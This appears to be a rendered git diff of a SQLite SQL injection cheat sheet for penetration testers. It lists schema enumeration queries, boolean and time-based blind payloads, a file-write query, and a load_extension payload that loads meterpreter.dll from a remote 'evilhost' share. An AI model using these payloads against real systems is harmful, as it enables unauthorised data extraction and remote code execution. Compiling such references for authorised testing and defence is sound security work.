- [A Penetration Tester's Guide to PostgreSQL - David Hayter - July 22, 2017](https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9) - [A Penetration Tester's Guide to PostgreSQL - David Hayter - July 22, 2017](https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9)

View File

@ -6,7 +6,7 @@
## Summary ## Summary
* [SQLite Comments](#sqlite-comments) * [SQLite Comments](#sqlite-comments)
* [SQLite Version](#sqlite-version) * [SQLite Enumeration](#sqlite-enumeration)
* [SQLite String](#sqlite-string) * [SQLite String](#sqlite-string)
* [SQLite String Methodology](#sqlite-string-methodology) * [SQLite String Methodology](#sqlite-string-methodology)
* [SQLite Blind](#sqlite-blind) * [SQLite Blind](#sqlite-blind)
@ -17,22 +17,26 @@
* [SQlite Remote Code Execution](#sqlite-remote-code-execution) * [SQlite Remote Code Execution](#sqlite-remote-code-execution)
* [Attach Database](#attach-database) * [Attach Database](#attach-database)
* [Load_extension](#load_extension) * [Load_extension](#load_extension)
* [SQLite File Manipulation](#SQLite-file-manipulation)
* [SQLite Read File](#SQLite-read-file)
* [SQLite Write File](#SQLite-write-file)
* [References](#references) * [References](#references)
## SQLite Comments ## SQLite Comments
| Type | Description | | Description | Comment |
|----------------------------|-----------------------------------| | ------------------- | ------- |
| `/* SQLite Comment */` | C-style comment | | Single-Line Comment | `--` |
| `--` | SQL comment | | Multi-Line Comment | `/**/` |
## SQLite Version ## SQLite Enumeration
| Description | SQL Query |
| ------------- | ----------------------------------------- |
| DBMS version | `select sqlite_version();` |
```sql
select sqlite_version();
```
## SQLite String ## SQLite String
@ -42,9 +46,12 @@ select sqlite_version();
| ----------------------- | ----------------------------------------- | | ----------------------- | ----------------------------------------- |
| Extract Database Structure | `SELECT sql FROM sqlite_schema` | | Extract Database Structure | `SELECT sql FROM sqlite_schema` |
| Extract Database Structure (sqlite_version > 3.33.0) | `SELECT sql FROM sqlite_master` | | Extract Database Structure (sqlite_version > 3.33.0) | `SELECT sql FROM sqlite_master` |
| Extract Table Name | `SELECT tbl_name FROM sqlite_master WHERE type='table'` |
| Extract Table Name | `SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'` | | Extract Table Name | `SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'` |
| Extract Column Name | `SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='table_name'` | | Extract Column Name | `SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='table_name'` |
| Extract Column Name | `SELECT GROUP_CONCAT(name) AS column_names FROM pragma_table_info('table_name');` | | Extract Column Name | `SELECT GROUP_CONCAT(name) AS column_names FROM pragma_table_info('table_name');` |
| Extract Column Name | `SELECT MAX(sql) FROM sqlite_master WHERE tbl_name='<TABLE_NAME>'` |
| Extract Column Name | `SELECT name FROM PRAGMA_TABLE_INFO('<TABLE_NAME>')` |
## SQLite Blind ## SQLite Blind
@ -78,6 +85,7 @@ AND CASE WHEN [BOOLEAN_QUERY] THEN 1 ELSE load_extension(1) END
```sql ```sql
AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
AND 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
``` ```
@ -100,6 +108,19 @@ UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');
``` ```
## SQLite File Manipulation
### SQLite Read File
SQLite does not support file I/O operations by default.
### SQLite Write File
```sql
SELECT writefile('/path/to/file', column_name) FROM table_name
```
## References ## References